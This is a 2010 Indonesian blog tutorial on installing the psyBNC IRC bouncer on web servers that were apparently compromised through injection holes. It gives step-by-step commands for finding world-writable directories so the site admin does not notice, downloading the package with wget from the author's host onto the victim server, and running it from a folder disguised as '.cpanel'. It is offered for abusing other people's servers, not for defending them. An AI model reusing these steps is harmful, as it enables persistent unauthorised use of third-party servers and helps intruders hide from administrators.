Cara Instal psyBNC - 3 February 2010 - Blog - Personal site

My site
Main | Blog | Registration | Login
Site menu
Our poll
Rate my site
Total of answers: 21
Statistics

Total online: 1
Guests: 1
Users: 0
Login form
Main » 2010 » February » 3 » Cara Instal psyBNC
7:13 AM
Cara Instal psyBNC
  • Bikin psyBNC Di Shell Inject

Pengen punya psyBNC admin sendiri…
Bisa adduser brapa kamu mau…

Hehehe… Gak perlu susah deh untuk dapet psybnc. Bikin sendiri juga gampang. Dibawah ini cara² bikin shell di web injekan :D

  1. Cari web injekan dulu… klo ga tau nyari, masuk aja ke server Scanner, Contoh : /s irc.indonesiancoder.biz Disana qm masuk di channel yang lagi SCANNING, contoh : #Scanner, gue yang punya chan itu).
  2. Bila loe dah dapet web injekannya. Sekarang loe test dulu PORT nya. Port brapa aja deh yang penting hasilnya REFUSED. Klo refused ini brarti port nya belum ada yang make. Contoh: Fobiabar.com 2080 Refused. Klo port web injekannya TIMEOUT, brarti web itu ga bs qta bikin psybnc nya.
  3. Nah klo qm dah masuk di web injeknya. Hal yang pertama loe cari adalah folder yang aman. Biar admin webnya ga tau qm tanam psybnc nya. Dan dimana di folder tersebut mestilah permision foldernya yes/ok jalan. Klo ditarget utama, Permisionnya Denied. Qm cari aja kayak gini -> find / -perm 777 -type d. Nah klo ntar ketemu, qm Copy aja salah satunya, trus Loe jalanin Di direktorinya. Atau ini nih yang biasanya kasi perm penuh /tmp/ atau /var/tmp/ . Taraaam... qm berhasil...
  4. Klo qm dah nemuin lokasinya, sekarang qta install kan psybnc nya. Ini source psyBNC nya; http://www.ariebunklon.com/psyBNC.tar.gz
  5. Wget kan source nya; caranya: wget http://www.ariebunklon.com/psyBNC.tar.gz ; selain wget loe juga bisa pake "Curl -O”,”lwp-download”,”fetch”. (atau kalo perintah wgetnya off. Loe bs pake cara upload manual, setelah Loe download Source yang tadi Gue kasih). Ni contoh klo dia berhasil :
0K ………. ………. ………. ………. ………. 33% 210K 0s
50K ………. ………. ………. ………. ………. 67% 749K 0s
100K ………. ………. ………. ………. ……. 100% 735K=0.4s

11:30:26 (399 KB/s) – `psybnc.zip’ saved [150682/150682]
  1. Klo udah wget/upload, lalu di extract kan. caranya: tar zxvf psyBNC.tar.gz
Ni contohnya klo berhasil qm Extract :
.cpanel/
.cpanel/config
.cpanel/config.h
.cpanel/fuck
.cpanel/help/
.cpanel/help/ADDALLOW.TXT
.cpanel/help/ADDASK.TXT
.cpanel/help/ADDAUTOOP.TXT
.cpanel/help/ADDBAN.TXT
.cpanel/help/ADDDCC.TXT
.cpanel/help/ADDIGNORE.TXT
.cpanel/help/ADDLOG.TXT
.cpanel/help/ADDNETWORK.TXT
.cpanel/help/ADDOP.TXT
.cpanel/help/ADDSERVER.TXT
.cpanel/help/ADDUSER.TXT
.cpanel/help/AIDLE.TXT
.cpanel/help/AUTOGETDCC.TXT
.cpanel/help/AUTOREJOIN.TXT
.cpanel/help/BCONNECT.TXT
.cpanel/help/BHELP.TXT
.cpanel/help/BKILL.TXT
.cpanel/help/BQUIT.TXT
.cpanel/help/BREHASH.TXT
.cpanel/help/BVHOST.TXT
.cpanel/help/BWHO.TXT
.cpanel/help/DCCANSWER.TXT
.cpanel/help/DCCCANCEL.TXT
.cpanel/help/DCCCHAT.TXT
.cpanel/help/DCCENABLE.TXT
.cpanel/help/DCCGET.TXT
.cpanel/help/DCCSEND.TXT
.cpanel/help/DCCSENDME.TXT
.cpanel/help/DELALLOW.TXT
.cpanel/help/DELASK.TXT
.cpanel/help/DELAUTOOP.TXT
.cpanel/help/DELBAN.TXT
.cpanel/help/DELDCC.TXT
.cpanel/help/DELENCRYPT.TXT
.cpanel/help/DELIGNORE.TXT
.cpanel/help/DELLINK.TXT
.cpanel/help/DELLOG.TXT
.cpanel/help/DELNETWORK.TXT
.cpanel/help/DELOP.TXT
.cpanel/help/DELSERVER.TXT
.cpanel/help/DELTRANSLATE.TXT
.cpanel/help/DELUSER.TXT
.cpanel/help/ENCRYPT.TXT
.cpanel/help/ERASEMAINLOG.TXT
.cpanel/help/ERASEPRIVATELOG.TXT
.cpanel/help/ERASETRAFFICLOG.TXT
.cpanel/help/JUMP.TXT
.cpanel/help/LEAVEQUIT.TXT
.cpanel/help/LINKFROM.TXT
.cpanel/help/LINKTO.TXT
.cpanel/help/LISTALLOW.TXT
.cpanel/help/LISTASK.TXT
.cpanel/help/LISTAUTOOPS.TXT
.cpanel/help/LISTBANS.TXT
.cpanel/help/LISTDCC.TXT
.cpanel/help/LISTENCRYPT.TXT
.cpanel/help/LISTIGNORES.TXT
.cpanel/help/LISTLINKS.TXT
.cpanel/help/LISTLOGS.TXT
.cpanel/help/LISTOPS.TXT
.cpanel/help/LISTSERVERS.TXT
.cpanel/help/LISTTASKS.TXT
.cpanel/help/MADMIN.TXT
.cpanel/help/NAMEBOUNCER.TXT
.cpanel/help/PASSWORD.TXT
.cpanel/help/PLAYMAINLOG.TXT
.cpanel/help/PLAYPRIVATELOG.TXT
.cpanel/help/PLAYTRAFFICLOG.TXT
.cpanel/help/PROXY.TXT
.cpanel/help/RELAYLINK.TXT
.cpanel/help/RELINK.TXT
.cpanel/help/SETAWAY.TXT
.cpanel/help/SETAWAYNICK.TXT
.cpanel/help/SETLANG.TXT
.cpanel/help/SETLEAVEMSG.TXT
.cpanel/help/SETUSERNAME.TXT
.cpanel/help/SOCKSTAT.TXT
.cpanel/help/SRELOAD.TXT
.cpanel/help/SWITCHNET.TXT
.cpanel/help/TRANSLATE.TXT
.cpanel/help/UNADMIN.TXT
.cpanel/httpd
.cpanel/lang/
.cpanel/lang/english.lng
.cpanel/lang/INFO
.cpanel/log/
.cpanel/log/INFO
.cpanel/motd/
.cpanel/proc
.cpanel/README
.cpanel/run
.cpanel/scripts/
.cpanel/scripts/DEFAULT.SCRIPT
.cpanel/xh
Ni perintah untuk hapus file psy yang qm wget tadi, rm psyBNC.tar.gz
  1. Klo udah ter extract, masuk ke folder psy-nya
  2. Lalu ketik ./config contoh: ./config 6969
  3. Ketik ./fuck dan kemudian ./run
Ni contoh yang keluar jika qm berhasil :
.-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-.
,—-.,—-.,-. ,-.,—.,–. ,-.,—-.
| O || ,-’ \ \/ / | o || \| || ,–’
| _/ _\ \ \ / | o< | |\ || |__
|_| |____/ |__| |___||_| \_| \___|
Version 2.3.1 (c) 1999-2003

Nah sekarang, coba qm buka mIRC mu, lalu konekin psyBNC nya. contoh: /s fobiabar.com 6969
Contoh file psyBNC nya bisa kamu download disini
Views: 1164 | Added by: ariebunklon | Rating: 0.0/0
Total comments: 0
Name *:
Email *:
Code *:
COMMENT DISINI

ShoutMix chat widget
Search
Calendar
«  February 2010  »
SuMoTuWeThFrSa
 123456
78910111213
14151617181920
21222324252627
28
Entries archive
Site friends
  • Create your own site
  • Copyright MyCorp © 2016 Free website builderuCoz